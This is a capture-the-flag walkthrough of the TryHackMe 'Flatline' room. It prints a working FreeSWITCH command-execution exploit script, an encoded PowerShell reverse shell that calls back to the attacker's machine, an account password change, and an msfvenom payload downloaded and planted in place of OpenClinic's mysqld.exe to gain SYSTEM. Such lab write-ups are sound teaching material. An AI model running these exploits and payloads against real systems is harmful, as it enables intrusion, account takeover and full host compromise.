Flatline

Posted on | In

You can find this machine here : https://tryhackme.com/room/flatline

Port Scan

1
2
3
4
5
6
┌──(kali㉿Zeus)-[~]
└─$ sudo nmap -Pn -sV 10.10.196.94

PORT     STATE SERVICE          VERSION
3389/tcp open  ms-wbt-server    Microsoft Terminal Services
8021/tcp open  freeswitch-event FreeSWITCH mod_event_socket

FreeSWITCH 1.10.1 - Command Execution

Exploitdb - FreeSWITCH 1.10.1 - Command Execution

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
#!/usr/bin/python3

from socket import *
import sys

if len(sys.argv) != 3:
    print('Missing arguments')
    print('Usage: freeswitch-exploit.py <target> <cmd>')
    sys.exit(1)

ADDRESS=sys.argv[1]
CMD=sys.argv[2]
PASSWORD='ClueCon' # default password for FreeSWITCH

s=socket(AF_INET, SOCK_STREAM)
s.connect((ADDRESS, 8021))

response = s.recv(1024)
if b'auth/request' in response:
    s.send(bytes('auth {}\n\n'.format(PASSWORD), 'utf8'))
    response = s.recv(1024)
    if b'+OK accepted' in response:
        print('Authenticated')
        s.send(bytes('api system {}\n\n'.format(CMD), 'utf8'))
        response = s.recv(8096).decode()
        print(response)
    else:
        print('Authentication failed')
        sys.exit(1)
else:
    print('Not prompted for authentication, likely not vulnerable')
    sys.exit(1)

PoC

1
2
3
4
5
6
7
┌──(kali㉿Zeus)-[~/Desktop]
└─$ python3 freeswitch-exploit.py 10.10.196.94 whoami
Authenticated
Content-Type: api/response
Content-Length: 25

win-eom4pk0578n\nekrotic

image

PowerShell Commands

1
python3 freeswitch-exploit.py 10.10.196.94 "powershell -Command whoami"

image

Reverse Shell - User Owned

  • Generate your powershell payload here : https://www.revshells.com/

PowerShell Payload

1
python3 freeswitch-exploit.py 10.10.196.94 "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQA4AC4ANAA1AC4ANQA2ACIALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA=="

Listener

1
2
3
4
5
6
7
8
9
10
┌──(kali㉿Zeus)-[~]
└─$ nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.18.45.56] from (UNKNOWN) [10.10.196.94] 49900

PS C:\Program Files\FreeSWITCH> whoami
win-eom4pk0578n\nekrotic
PS C:\Program Files\FreeSWITCH> hostname
WIN-EOM4PK0578N
PS C:\Program Files\FreeSWITCH>

image

Nekrotic

1
cd ../../Users/nekrotic/desktop

image

Change User Password

1
PS C:\Users\nekrotic\desktop> net user nekrotic al1enum#4ttack

image

RDP Access

1
xfreerdp /f /v:10.10.196.94 /u:nekrotic /p:al1enum#4ttack

image

Privileges Escalation - OpenClinic

  • Path : C:\projects\openclinic

image

  • Resource : https://www.exploit-db.com/exploits/50448

  • Exit Full Screen : CTRL + ALT + ENTER

Generate malicious .exe on attacking machine

1
2
msfvenom -p windows/shell_reverse_tcp LHOST=10.18.45.56 LPORT=5555 -f exe > mysqld_evil.exe
python3 -m http.server 80

image

Download malicious .exe on victim machine

1
2
3
$source = 'http://10.18.45.56/mysqld_evil.exe'
$destination = 'C:\projects\openclinic\mariadb\bin\mysqld.exe > mysqld.bak'
Invoke-WebRequest -Uri $source -OutFile $destination

image

  • run as administrator
1
2
3
4
cd C:\projects\openclinic\mariadb\bin
rename mysqld.exe mysqld.bak
rename mysqld_evil.exe mysqld.exe
shutdown /r

image

System Owned

  • after machine restarted

image